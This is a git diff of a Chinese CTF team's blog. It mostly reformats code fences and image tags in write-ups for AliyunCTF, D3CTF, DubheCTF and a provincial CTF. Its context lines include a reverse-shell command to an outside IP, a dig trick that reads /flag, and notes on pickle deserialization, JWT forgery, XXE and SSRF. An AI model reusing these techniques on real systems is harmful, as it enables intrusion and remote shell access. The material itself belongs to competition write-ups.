diff --git a/source/_posts/2024-AliyunCTF.md b/source/_posts/2024-AliyunCTF.md index 4f2d14b..2a74f6c 100644 --- a/source/_posts/2024-AliyunCTF.md +++ b/source/_posts/2024-AliyunCTF.md @@ -294,7 +294,7 @@ string s1, string s2, string s3, string s4, string s5, string s6 -> int { ## BadApple -```Python +```javascript let abuf = new ArrayBuffer(0x10); let bbuf = new BigUint64Array(abuf); let fbuf = new Float64Array(abuf); @@ -735,7 +735,7 @@ if __name__ == '__main__': main() ``` -![img](../images/2024-AliyunCTF/20240325204801605.webp) +![](../images/2024-AliyunCTF/20240325204801605.webp) ## BabyDH2 @@ -1204,7 +1204,7 @@ if __name__ == '__main__': g.gao() ``` -![img](../images/2024-AliyunCTF/20240325204801682.webp) +![](../images/2024-AliyunCTF/20240325204801682.webp) # Web @@ -1218,7 +1218,7 @@ https://gtfobins.github.io/gtfobins/dig/ {"domain":"l1nyz-tel.cc","type":"-f/flag"} ``` -![img](../images/2024-AliyunCTF/20240325204801511.webp) +![](../images/2024-AliyunCTF/20240325204801511.webp) ## chain17 @@ -1401,11 +1401,11 @@ dfs(start) 010打开发现文件中只有UTF-8字符,没有其他数据;一眼盯出,同时存在长得很像的“文”字和类似字 -![img](../images/2024-AliyunCTF/20240325204801578.webp) +![](../images/2024-AliyunCTF/20240325204801578.webp) 换用兼容性不强的艺术字体(图中是字体圈欣意冠黑体)把这些字凸显出来,在Unicode表中检索,可以知道它们都是[康熙部首](https://zhuanlan.zhihu.com/p/352872903):`assert all([0x2f00 <= ord(c) <= 0x2fdf for c in '⽂⾼⾦⾄⽣⽇⽌⽤⾔⽅⾧⾯⾹⾮⾃⼈⼯⼀⼗⼥⾳⽽⽬⼤⼆⼲⼿⽃⾖⼜⾻⼐⼩⾊⽰⽕⾍⽅⿎⽴⼊⾏⽉⽇'])` -![img](../images/2024-AliyunCTF/20240325204801469.webp) +![](../images/2024-AliyunCTF/20240325204801469.webp) 原文有意义,不太可能是取这种字的字码,也不太可能是两个这种字之间的距离,因为有意义的原文不是这么好构造的。可以尝试把康熙部首和对应的正常字分别变成1和0 @@ -1655,7 +1655,7 @@ print(char) 得到332bits,给0和1分别上色,发现如果每14位分为一组,刚好最高位都是0,且存在相同的几行 -![img](../images/2024-AliyunCTF/20240325204801445.webp) +![](../images/2024-AliyunCTF/20240325204801445.webp) 猜测14位编码一个汉字,尝试按区位码处理 diff --git a/source/_posts/2024-D3CTF.md b/source/_posts/2024-D3CTF.md index 3880e49..36f0d7e 100644 --- a/source/_posts/2024-D3CTF.md +++ b/source/_posts/2024-D3CTF.md @@ -15,7 +15,7 @@ mathjax: true ## 1.1 PwnShell -```C +```php & /dev/tcp/8.129.42.140/3307 0>&1" 打包,注意z参数 -```C++ +```bash tar czf 1.tar sandbox .sandbox-module ``` @@ -791,7 +791,7 @@ Github 上给的 example 中分母就是一个 solve,猜测这里的分母和 代入两个式子后 Coppersmith 或者 gcd 两种方法都能求出 x, y -```Plain +```python x,y=(2150041731351815713171104523921920493220624053206985451744233895108303740469684723305396314365408654901185731316940674743393624005747389336974965252847296612520628261079495101318288878763133399451251, 226424529213344999668721893182041940135510332166374912207004824461410074124256560817809951006519763202279310112144759780123971358841835703176196881303793274922977845173880043211792854018584878197697797884263497201497403074557926911586759787949296373546575946325913789515250) from Crypto.Util.number import * @@ -903,7 +903,7 @@ print(L) 爆 -```Python +```c++ #include using namespace std; @@ -1026,6 +1026,9 @@ int main(int argc, char const *argv[]) } // g++ multi.cpp -O3 -lpthread -o multi +``` + +```python import random secret_KEY = 886 from task_utils import * @@ -1091,24 +1094,9 @@ class Gao: if __name__ == '__main__': g = Gao() g.test_get_flag() -from PIL import Image -from image_crypto import ImageEncryption, bytes_to_image, image_to_bytes - -width, height = 72, 60 +``` -tap_list = [[0, 0, 0, 0], - [0, 0, 0, 0], - [0, 0, 0, 0], - [0, 0, 0, 0]] -chunk_size = 16 -iv = '00000000000000000000000000000000' -iv = bytes.fromhex(iv) -enc = ImageEncryption(tap_list=tap_list, iv=iv) -img_c = Image.open('enc_from_server.png') -img_cb = image_to_bytes(img_c) -img_mb = enc.decryption(img_cb) -img_m = bytes_to_image(img_mb, width, height) -img_m.save('dec.png') +```python from PIL import Image from image_crypto import ImageEncryption, bytes_to_image, image_to_bytes @@ -1129,7 +1117,7 @@ img_m = bytes_to_image(img_mb, width, height) img_m.save('dec.png') ``` -![img](../images/2024-D3CTF/image2.webp) +![](../images/2024-D3CTF/image2.webp) ## 3.5 enctwice @@ -1296,7 +1284,7 @@ if __name__ == '__main__': 用伪随机数来决定虚拟机流程的虚拟机。首先打开ida的trace function可以dump出整个大概的执行流程,提取出函数的偏移,然后用idapython脚本可以提取大概的真正有用的汇编指令 -```C++ +```python from idaapi import * from idc import * from ida_bytes import * @@ -1332,7 +1320,7 @@ open(r"C:\Users\xman\Downloads\RandomVM\log.txt").write(final) 随后就是在每个xor和shl下断点 -```C++ +```python def rotate_left(num, shift): if shift >= 8: return 0 @@ -1472,7 +1460,7 @@ f.write(f"{num:#x} >> {al} = {(num>>al)&0xffffffffff:#x}\n") 输入0123456789ABCDEFGHIJKLMNOPQRSTUVWXY得到trace: -```Plain +```c 0x2324252627 << 4 = 0x3242526270 0x2324252627 >> 5 = 0x119212931 0x3242526270 ^ 0x119212931 = 0x335b734b41 @@ -1540,15 +1528,15 @@ D3CTF(TECH-EV0LVE,EMBR@C3-PR0GR3SS) 爆破到 d3ctf{0ut??????????????} 不给爆了 乐 -![img](../images/2024-D3CTF/image3.webp) +![](../images/2024-D3CTF/image3.webp) 18496 = 64 * 17 * 17, 每64byte一组,迷宫一共17*17大,win的条件是触发c000005,需要跑出去迷宫 -![img](../images/2024-D3CTF/image4.webp) +![](../images/2024-D3CTF/image4.webp) SEH里边根据当前位置的两个常量计算返回地址,num 1,2就是下图data里的两个常量,所以走迷宫,从MSB开始根据每一位是0还是1决定用上边两个还是下边两个计算下一次跳转的位置 -![img](../images/2024-D3CTF/image5.webp) +![](../images/2024-D3CTF/image5.webp) 想走出去最后一次应该计算出一个比较大的值,那从0x406030+18496每64byte切片,然后从FF开始反向搜索,上图每两个cli对应一个flag bit上边是0下边是1,每两个cli里常量上边是*1的下边是*17的 @@ -1605,7 +1593,7 @@ for a in range(33, 127): f.close() ``` -![img](../images/2024-D3CTF/image6.webp) +![](../images/2024-D3CTF/image6.webp) ## 4.4 ezjunk @@ -1621,7 +1609,7 @@ fakeflag和flag在tea上无区别 **crc校验:** -![img](../images/2024-D3CTF/image7.webp) +![](../images/2024-D3CTF/image7.webp) exp: @@ -1735,7 +1723,7 @@ https://koalastothemax%com/?aHR0cMM6Ly9rLnBvc3RpbWcuY2MvOVh4MHhmc1svZmxh_y5ebmc= 附件里有一个 OpenVPN 配置,但是缺少了 TLS key 部份。然后题目说缺失的部份在前往 `2a13:b487:11aa::d3:c7f:2f` 的路径上。所以就 mtr 一下,得到: -![img](../images/2024-D3CTF/image8.webp) +![](../images/2024-D3CTF/image8.webp) 按顺序拼起来就是 TLS key,而且长度刚好是整数。有了完整配置之后,就能通过 OpenVPN 连上实例。 @@ -1751,4 +1739,4 @@ https://koalastothemax%com/?aHR0cMM6Ly9rLnBvc3RpbWcuY2MvOVh4MHhmc1svZmxh_y5ebmc= 在activity里有flag -![img](../images/2024-D3CTF/image9.webp) \ No newline at end of file +![](../images/2024-D3CTF/image9.webp) \ No newline at end of file diff --git a/source/_posts/2024-DubheCTF.md b/source/_posts/2024-DubheCTF.md index a72a48e..2483083 100644 --- a/source/_posts/2024-DubheCTF.md +++ b/source/_posts/2024-DubheCTF.md @@ -18,9 +18,9 @@ toc: true 根据提示开始脑洞,githack dump 源码 -![img](../images/2024-DubheCTF/20240319010444813.webp) +![](../images/2024-DubheCTF/20240319010444813.webp) -![img](../images/2024-DubheCTF/20240319010444894.webp) +![](../images/2024-DubheCTF/20240319010444894.webp) 通过 `range: bytes={start}-{end}` 来读取 mem 中的密钥,伪造成 admin 上传 pt 文件,之后 torch load 的时候触发 pickle 反序列化。 @@ -156,7 +156,7 @@ if __name__ == '__main__': Pickle 反序列化的时候,exec 执行一段 python 代码,新建一个 `@app.post("/")` 路由(相当于内存马? -![img](../images/2024-DubheCTF/20240319010444749.webp) +![](../images/2024-DubheCTF/20240319010444749.webp) 将 bot 发送的东西都写到一个文件里,弹 shell 进去 cat 看看即可 @@ -297,7 +297,7 @@ http://1.95.13.243:49319/getlocal?path=/app/pref.yml 同时看到没有打开 cache 功能 -![img](../images/2024-DubheCTF/20240319010444775.webp) +![](../images/2024-DubheCTF/20240319010444775.webp) 需要找另一个文件写入点 @@ -322,7 +322,7 @@ function parse(x) { http://1.95.13.243:49319/sub?target=clash&url=script:pref.yml&token=189069462103782304169366230 -![img](../images/2024-DubheCTF/20240319010444751.webp) +![](../images/2024-DubheCTF/20240319010444751.webp) ## Javolution @@ -330,7 +330,7 @@ http://1.95.13.243:49319/sub?target=clash&url=script:pref.yml&token=189069462103 http://1.95.54.152:34473/pal/cheat?hp=-1000000000&attack=-1000000000&defense=-1000000000 -![img](../images/2024-DubheCTF/20240319010444758.webp) +![](../images/2024-DubheCTF/20240319010444758.webp) 然后 level 变 50 @@ -350,7 +350,7 @@ Jdk 17 反序列化 --add-opens java.xml/``com.sun.org``.apache.xpath.internal.objects=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED ``` -![img](../images/2024-DubheCTF/20240319010444936.webp) +![](../images/2024-DubheCTF/20240319010444936.webp) ```Java import com.fasterxml.jackson.databind.node.POJONode; @@ -720,7 +720,7 @@ for t in range(0, 257): pass ``` -![img](../images/2024-DubheCTF/20240319010444891.webp) +![](../images/2024-DubheCTF/20240319010444891.webp) 你永远可以相信可靠的J神逆出来的代码不会有任何问题 @@ -921,7 +921,7 @@ sh.interactive() print(open('/flag').read()) ``` -![img](../images/2024-DubheCTF/20240319010444993.webp) +![](../images/2024-DubheCTF/20240319010444993.webp) ``` DubheCTF{l3HC7F_h45_4_8e77ER_Ch4lLEngE!} @@ -999,7 +999,7 @@ alt-svc: h3=":443"; ma=86400 搭好这个隧道之后,就可以用 https://devtools.devprod.cloudflare.dev 连接这个 inspect 端口对 wrangler 项目进行调试。不过断点貌似不是很好下,不过可以在 Memory 里直接把整个 heap snapshot 导出,导出之后搜索一下 flag 就可以了。 -![img](../images/2024-DubheCTF/20240319010444931.webp) +![](../images/2024-DubheCTF/20240319010444931.webp) ## no more taowa @@ -1504,7 +1504,7 @@ if __name__ == '__main__': # print(png_judge_type('./lsb_msb_test/' + f)) ``` -![img](../images/2024-DubheCTF/20240319010445007.webp) +![](../images/2024-DubheCTF/20240319010445007.webp) ``` DubheCTF{j00_H4V3_m4573r3d_m47Ry05HK4_d0Ll2!} diff --git a/source/_posts/2024-ProvinceCTF.md b/source/_posts/2024-ProvinceCTF.md index 8985cc9..76a0e3e 100644 --- a/source/_posts/2024-ProvinceCTF.md +++ b/source/_posts/2024-ProvinceCTF.md @@ -36,7 +36,7 @@ Access Denied 用 X-Forwarded-For 伪造成 127.0.0.1 进行绕过 这个 file 的传参什么都没说,要自己测,应该是要求以 `php://` 开头,而且限制了长度 -![img](../images/2024-ProvinceCTF/image1.webp) +![](../images/2024-ProvinceCTF/image1.webp) ### Hackme(套娃缝合怪) @@ -53,7 +53,7 @@ docker run -it sig2n /bin/bash root@201317bd1ea9:/app python3 jwt_forgery.py eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4iLCJpcCI6IjE3Mi4yMC4yNDAuMzIifQ.DDtMChPMQtBA_2_wJxLPO_6g5dTaM7stY2Knngol6qAeaWh4Y8EjY6ndBLuEMhXYyecpiLFXZxEPqkV_GW3rGReg7LTCfIb4x6M6RRhotbersK1AGKKGUyVHmr0es0bHpw eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VyIjoidGVzdCIsImlwIjoiMTcyLjIwLjI0MC4zMiJ9.A9CrtyzLavHQif9VRIHJN1kSjLefzcKPArv3Eo96EbSlD5gzRU78QGiFkdtW_YxQgYc7z82PqH1BQGWMf5CLBfYSQNB6V9HV7FyZJUpzZt2b-irXitYFhW2qQJr0i_yrJA ``` -![img](../images/2024-ProvinceCTF/image2.webp) +![](../images/2024-ProvinceCTF/image2.webp) 得到4个公钥文件 @@ -143,7 +143,7 @@ echo "Encode:\n" . print_r($jwt, true) . "\n"; 校验成功 -![img](../images/2024-ProvinceCTF/image3.webp) +![](../images/2024-ProvinceCTF/image3.webp) 第二层有个文件上传接口,一个getfile.php的文件下载接口 @@ -151,13 +151,13 @@ echo "Encode:\n" . print_r($jwt, true) . "\n"; 无法访问上传的文件,猜测oss和题目是一台服务器,访问本地的8000端口 -![img](../images/2024-ProvinceCTF/image4.webp) +![](../images/2024-ProvinceCTF/image4.webp) xml数据错误,文件路径正确会显示download error => xxe,xxe禁止了system字符 => iconv编码绕过 -![img](../images/2024-ProvinceCTF/image5.webp) +![](../images/2024-ProvinceCTF/image5.webp) -![img](../images/2024-ProvinceCTF/image6.webp) +![](../images/2024-ProvinceCTF/image6.webp) ### unserialize_web(原题) @@ -191,7 +191,7 @@ www.zip 下载到源码 题目环境不出网,但是题目中对 tcpdf 的代码做了一点小修改,让其可以直接打 gopher ssrf -![img](../images/2024-ProvinceCTF/image7.webp) +![](../images/2024-ProvinceCTF/image7.webp) payload @@ -227,7 +227,7 @@ p.interactive() ### re1(无法验证flag正确性) -![img](../images/2024-ProvinceCTF/image8.webp) +![](../images/2024-ProvinceCTF/image8.webp) 脑洞,main往上有一段deadcode是xxtea,delta改0xA4EE8C0其他不变 (可能因为n=2时y和z刚好重复了) @@ -461,7 +461,7 @@ cmd.exe /c start "wt.exe" -w 0 nt -d . wsl.exe -d Ubuntu-22.04 bash -c "./brute cmd.exe /c start "wt.exe" -w 0 nt -d . wsl.exe -d Ubuntu-22.04 bash -c "./brute 240" ``` -![img](../images/2024-ProvinceCTF/image10.webp) +![](../images/2024-ProvinceCTF/image10.webp) ## Misc @@ -477,9 +477,9 @@ cmd.exe /c start "wt.exe" -w 0 nt -d . wsl.exe -d Ubuntu-22.04 bash -c "./brute ### 你要的就在这 -![img](../images/2024-ProvinceCTF/image11.webp) +![](../images/2024-ProvinceCTF/image11.webp) -![img](../images/2024-ProvinceCTF/image12.webp) +![](../images/2024-ProvinceCTF/image12.webp) 取前六位为密钥 @@ -499,7 +499,7 @@ stegpy xxx.png -p 然后把对称算法都脑洞一遍(RC系列 AES系列 DES系列...) -![img](../images/2024-ProvinceCTF/image13.webp) +![](../images/2024-ProvinceCTF/image13.webp) ## Crypto diff --git a/source/_posts/index.md b/source/_posts/index.md index a12f231..1648592 100644 --- a/source/_posts/index.md +++ b/source/_posts/index.md @@ -10,9 +10,9 @@ sticky: 1
2024 -- D3CTF 2024 第二名 +- D^3CTF 2024 第二名 -- AliyunCTF 2024 第五名 +- 阿里云 CTF 2024 第五名 - XCTF 联赛 DubheCTF 2024 第五名